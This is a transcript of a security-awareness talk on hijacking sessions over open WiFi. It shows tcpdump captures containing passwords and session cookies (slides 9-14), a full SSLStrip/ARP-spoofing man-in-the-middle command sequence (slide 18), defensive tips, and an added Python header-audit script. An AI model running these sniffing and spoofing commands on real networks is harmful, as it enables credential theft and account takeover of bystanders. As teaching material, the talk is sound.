Session hijacking for dummies
Presentation Transcript

• session hijacking for dummies (Friedemann Wulff-Woesten, WDCM Dresden) [slide 1]

• What is this all about? [slide 2]
    • especially in the Czech Republic: unencrypted WiFi everywhere
    • Facebook is for many people THE platform to communicate
    • many mobile devices have Facebook apps; even more data = more possibilities to attack
    • problem: almost no one types https://, so the browser always connects to port 80

• What is this all about? [slide 3]
    • this is a serious security threat
    • tools are freely available, no one cares
    • Facebook ignores the problem
    • Google went full SSL

• HTTP is stateless [slide 4]
    • Request, Response
    • send username/password once
    • receive cookie
    • use cookie for all future requests

• Cookies need to be kept secret [slide 5]
• even better: WiFi [slide 8]
    • cookies shouted through the air
    • someone just has to start listening

• let's listen... [slide 9]

    imac:~ eisenrah$ sudo tcpdump -A -v -i en1 tcp port 80
    tcpdump: listening on en1, link-type EN10MB (Ethernet), capture size 65535 bytes
    [...]
    17:01:36.119066 IP (tos 0x0, ttl 64, id 45430, offset 0, flags [DF], proto TCP (6), length 102)
        imac.52070 > w9e.rzone.de.http: Flags [P.], cksum 0x3e95 (correct), seq 854:904, ack 1, win 33120, options [nop,nop,TS val 709324897 ecr 1167316720], length 50
    E..f.v@.@.3.....Q....f.P.V.6)!y....`>......*GpaE...username=wdcmdd&password=meinsogeheimespasswort
    [...]

• Example: Request [slide 10]

    POST /login.php?login_attempt=1 HTTP/1.1
    Host: login.facebook.com

    email=e2@eisenrah.com&pass=ichmagdietu

• Example: Response [slide 11]

    HTTP/1.1 302 Found
    Location: http://www.facebook.com/home.php?
    Set-Cookie: xs=a1cac26e11645bca984ea98f98a6a19c; path=/; domain=.facebook.com; httponly
• Problem: AJAX [slide 12]
    • AJAX requests carry the session cookie without the user clicking anywhere

• tcpdump: В Контакте [slide 13]

    17:18:32.656064 IP (tos 0x0, ttl 64, id 7684, offset 0, flags [DF], proto TCP (6), length 674)
        imac.52256 > srv64-131.vkontakte.ru.http: Flags [P.], cksum 0x84a6 (correct), seq 930:1552, ack 743, win 65535, options [nop,nop,TS val 710338737 ecr 2377981922], length 622
    E.....@.@..[....W..@. .P*......d...........*V......POST /im915 HTTP/1.1
    Host: q63.queue.vk.com
    Connection: keep-alive
    Referer: http://q63.queue.vk.com/q_frame.php?3
    Content-Length: 307
    Origin: http://q63.queue.vk.com
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
    Cookie: remixchk=5; remixlang=0; remixsid=2a72ff88d120569ae115f1e01885c5f14674dab175a1fb5392441d4e9840

• tcpdump: Facebook [slide 14]

    21:39:06.513002 IP (tos 0x0, ttl 64, id 35287, offset 0, flags [DF], proto TCP (6), length 1306)
        imac.50781 > channel2-02-01-snc4.facebook.com.http: Flags [P.], cksum 0xca09 (correct), seq 1:1255, ack 263, win 32830, options [nop,nop,TS val 689948758 ecr 2100724491], length 1254
    E.....@.@.e@....B..$.].P..!p.......>. .....)..V}6..GET /x/4057007781/1328384618/true/p_100001070666929=23 HTTP/1.1
    Host: 0.44.channel.facebook.com
    Connection: keep-alive
    Referer: http://0.44.channel.facebook.com/iframe/11?r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyX%2Fr%2Fimb8Z50C5TH.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyF%2Fr%2Fx3LLBUl8mEP.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyH%2Fr%2FwtfO3BqjZSC.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyz%2Fr%2FhFfiXiUF_l3.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyE%2Fr%2FSp2IUK7A8Z2.js
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
    Accept: */*
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
    Cookie: c_user=100001070666929; datr=-J0UTvLh4Us6mmd4HoAFaYWl; L=2; lu=Rg43lZE4nMjM3vtnDl9S-BPw; sct=1312918035; xs=60%3A8a0d1e5b0344cca655fd1566026f513c; p=44; act=1312918349733%2F16; presence=EM312918690L44REp_5f1B01070666929F23X312918690038Y1312918638OQ0EsF0CEblFDacF19G312918689PEuoFD1B01609907228FDexpF1312918709806EflF_5b1_5dEolF0CE1B00195332181FDexpF13129187B69EflF_5b_5dEolF-1CCEalFD1B01609907228FDiF0EmF0CCCC; wd=840x952
• facebook.js changes [slide 15]

• What can you do? [slide 16]
    • always full SSL: type https:// in the address bar
    • click "Log out" (doesn't guarantee the session is invalidated)
    • use at least WPA2
    • use a VPN, e.g. https://webvpn.zih.tu-dresden.de/

• Even worse [slide 17]
    • Facebook Like button (included in many blogs) and Tweet buttons: cookies sent with HTTP
    • dirty: active attack with SSLStrip (redirects every HTTPS request to HTTP)

• Example: SSLStrip [slide 18]

    sudo -s
    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
    sslstrip -l 1000
    ip route show | grep default | awk '{ print $3 }'
    arpspoof <gatewayIP>
    ettercap -Tzq
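As an added example (not part of the slides), a small Python audit of a login response like the one on slide 11, checked against the slide 16 advice: it flags a session cookie set without the Secure attribute, a redirect to plain http://, and a missing Strict-Transport-Security (HSTS) header, which is the standard browser-side defence against the HTTPS-to-HTTP downgrade on slide 17. The hardened header set, the example.com host, the SameSite attribute and the placeholder cookie value are assumptions.

```python
# Weak sample (constructed) modelled on slide 11; the cookie value is a placeholder.
WEAK_RESPONSE_HEADERS = [
    ("Location", "http://www.facebook.com/home.php?"),
    ("Set-Cookie", "xs=PLACEHOLDER_SESSION_ID; path=/; domain=.facebook.com; httponly"),
]

# Hardened equivalent (assumed, not from the slides): HTTPS redirect target,
# Secure + HttpOnly on the session cookie, and an HSTS header so the browser
# refuses plain HTTP for the domain afterwards (blocks the SSLStrip downgrade).
HARDENED_RESPONSE_HEADERS = [
    ("Location", "https://www.example.com/home.php"),
    ("Set-Cookie", "xs=PLACEHOLDER_SESSION_ID; path=/; domain=.example.com; "
                   "Secure; HttpOnly; SameSite=Lax"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
]

# Cookie names that carry the session in the captures on slides 11, 13 and 14.
SESSION_COOKIE_NAMES = {"xs", "c_user", "remixsid"}

def parse_set_cookie(value):
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lower: val})."""
    parts = [p.strip() for p in value.split(";")]
    name, _, cookie_value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), cookie_value.strip(), attrs

def audit_response(headers):
    """Return a list of findings; empty means the session never travels over HTTP."""
    findings = []
    hsts = False
    for name, value in headers:
        lname = name.lower()
        if lname == "strict-transport-security":
            hsts = True
        elif lname == "location" and value.lower().startswith("http://"):
            findings.append("redirect target is plain http://")
        elif lname == "set-cookie":
            cname, _, attrs = parse_set_cookie(value)
            if cname in SESSION_COOKIE_NAMES:
                if "secure" not in attrs:
                    findings.append(f"cookie {cname} lacks Secure (sent over port 80)")
                if "httponly" not in attrs:
                    findings.append(f"cookie {cname} lacks HttpOnly")
    if not hsts:
        findings.append("no Strict-Transport-Security header (HTTPS downgrade not blocked)")
    return findings
```

Running audit_response over the weak headers returns three findings; over the hardened headers it returns an empty list.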
• friedemann@wulff-woesten.de, http://wiki.eisenrah.com/wiki/Sessions [slide 19]

• @cdine, @codebutler, @eisenrah, @moxie__ [slide 20]

• Sources [slide 21]
    • elmo and cookie monster: http://1450knsi.com/assets/images/Elmo%20Cookie%20Monster.jpg
    • wireshark collage: http://www.flickr.com/photos/43707902@N04/4022449442/ http://www.flickr.com/photos/43707902@N04/4022445684/ http://carlosadlrs.files.wordpress.com/2011/07/wireshark-logo.png
    • wireshark screenshot: http://dump.taylor-hughes.com/wireshark-tadalist.png
    • firesheep facebook.js screenshot: http://1.bp.blogspot.com/_BQgAZ7cjkHQ/TTbVkUVb4DI/AAAAAAAABcg/NWl1KI5PCWA/s1600/Screenshot-9.png